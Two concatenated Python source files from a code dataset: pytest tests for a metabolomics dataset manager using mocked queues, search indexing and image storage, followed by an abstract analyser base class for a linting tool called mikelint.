def test_delete_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path', 'action': DatasetAction.DELETE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_equal_metadata_diff(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.metadata = {'new': 'metadata'}
ds_man.update(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.UPDATE}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
def test_update_ds__configs_metadata_equal__do_nothing(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.update(ds)
action_queue_mock.assert_not_called()
def test_add_ds__new_mol_db(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds.config['databases'] = [{'name': 'HMDB'}, {'name': 'ChEBI'}]
ds_man.add(ds)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.DEFAULT)])
def test_add_optical_image(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_mock = MagicMock(ImageStoreServiceWrapper)
img_store_mock.post_image.side_effect = ['opt_img_id1', 'opt_img_id2', 'opt_img_id3', 'thumbnail_id']
img_store_mock.get_image_by_id.return_value = Image.new('RGB', (100, 100))
ds_man = create_ds_man(sm_config=sm_config, db=db, es=es_mock,
img_store=img_store_mock, action_queue=action_queue_mock, sm_api=True)
ds_man._annotation_image_shape = MagicMock(return_value=(100, 100))
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
zoom_levels = [1, 2, 3]
raw_img_id = 'raw_opt_img_id'
ds_man.add_optical_image(ds, raw_img_id, [[1, 0, 0], [0, 1, 0], [0, 0, 1]],
zoom_levels=zoom_levels)
assert db.select('SELECT * FROM optical_image') == [
('opt_img_id{}'.format(i + 1), ds.id, zoom)
for i, zoom in enumerate(zoom_levels)]
assert db.select('SELECT optical_image FROM dataset where id = %s', params=(ds_id,)) == [(raw_img_id,)]
assert db.select('SELECT thumbnail FROM dataset where id = %s', params=(ds_id,)) == [('thumbnail_id',)]
class TestSMDaemonDatasetManager:
class SearchJob:
def __init__(self, *args, **kwargs):
pass
def run(self, *args, **kwargs):
pass
def test_add_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
db = DB(sm_config['db'])
try:
ds_man = create_ds_man(sm_config, db=db, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds_name = 'ds_name'
input_path = 'input_path'
upload_dt = datetime.now()
metadata = {}
ds = create_ds(ds_id=ds_id, ds_name=ds_name, input_path=input_path, upload_dt=upload_dt,
metadata=metadata, ds_config=ds_config)
ds_man.add(ds, search_job_factory=self.SearchJob)
DS_SEL = 'select name, input_path, upload_dt, metadata, config from dataset where id=%s'
assert db.select_one(DS_SEL, params=(ds_id,)) == (ds_name, input_path, upload_dt, metadata, ds_config)
finally:
db.close()
def test_update_ds(self, fill_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
ds_man = create_ds_man(sm_config, es=es_mock, action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
with patch('sm.engine.dataset_manager.MolecularDB') as MolecularDB:
mol_db_mock = MolecularDB.return_value
mol_db_mock.name = 'HMDB'
with patch('sm.engine.dataset_manager.MolDBServiceWrapper') as MolDBServiceWrapper:
moldb_service_wrapper_mock = MolDBServiceWrapper.return_value
moldb_service_wrapper_mock.find_db_by_id.return_value = {'name': 'HMDB-v4'}
ds_man.update(ds)
es_mock.delete_ds.assert_called_with(ds_id)
call_args = es_mock.index_ds.call_args[1].values()
assert ds_id in call_args and mol_db_mock in call_args
def test_delete_ds(self, fill_db, sm_config, ds_config):
db = DB(sm_config['db'])
action_queue_mock = MagicMock(spec=QueuePublisher)
es_mock = MagicMock(spec=ESExporter)
img_store_service_mock = MagicMock(spec=ImageStoreServiceWrapper)
ds_man = create_ds_man(sm_config, db=db, es=es_mock, img_store=img_store_service_mock,
action_queue=action_queue_mock, sm_api=False)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.delete(ds)
ids = ['iso_image_{}_id'.format(id) for id in range(1, 3)]
img_store_service_mock.delete_image_by_id.assert_has_calls(
[call('fs', 'iso_image', ids[0]), call('fs', 'iso_image', ids[1])])
es_mock.delete_ds.assert_called_with(ds_id)
assert db.select_one('SELECT * FROM dataset WHERE id = %s', params=(ds_id,)) == []
| 1.46875 | 1 |
mikelint/analysers/analyser.py | mike-fam/mikelint | 2 | 38276 | """
Abstract analyser
"""
from functools import wraps
from inspect import getmembers, ismethod
from typing import Callable
from ..type_hints import AnalyserResults, AnalyserHelper
from ..utils import SyntaxTree, BaseViolation, ViolationResult
def register_check(error_format: str):
"""
Registers a new checker to an analyser
Args:
error_format: error format of violation
"""
def decorator(check_method: Callable):
@wraps(check_method)
def wrapper(*args, **kwargs):
analyser = args[0]
checker_name = check_method.__name__
analyser.register_checker(checker_name,
check_method.__doc__,
error_format)
result: list[ViolationResult] = check_method(*args, **kwargs)
analyser.add_violations(checker_name, result)
return wrapper
return decorator
class Analyser:
"""Abstract base analyser"""
def __init__(self, sources: dict[str, AnalyserHelper]):
"""
Constructor
Args:
tree: syntax tree
source: list of lines from source code
"""
self._check_results: AnalyserResults = {}
self._sources = sources
def register_checker(self, name: str, description: str, error_format: str):
"""
Registers a new checker to this analyser
Args:
name: name of the checker, typically the method name
description: description of this checker
error_format: format string used to display violations
"""
self._check_results[name] = BaseViolation(description, error_format, [])
def get_results(self) -> AnalyserResults:
"""
Returns results of all checkers of this analyser
"""
return self._check_results
def add_violations(self, checker_name: str,
results: list[ViolationResult]) -> None:
"""
Adds violation results to a checker
Args:
checker_name: name of the checker
results: list of violation results
"""
self._check_results[checker_name].values.extend(results)
def get_line(self, file_name: str, line_number: int) -> str:
"""Returns line given line number"""
return self._sources[file_name].source[line_number - 1].strip()
def run(self):
"""
Runs all checkers
"""
for method_name, method in getmembers(self, predicate=ismethod):
if not method_name.startswith("check_"):
continue
method()
| 2.5625 | 3 |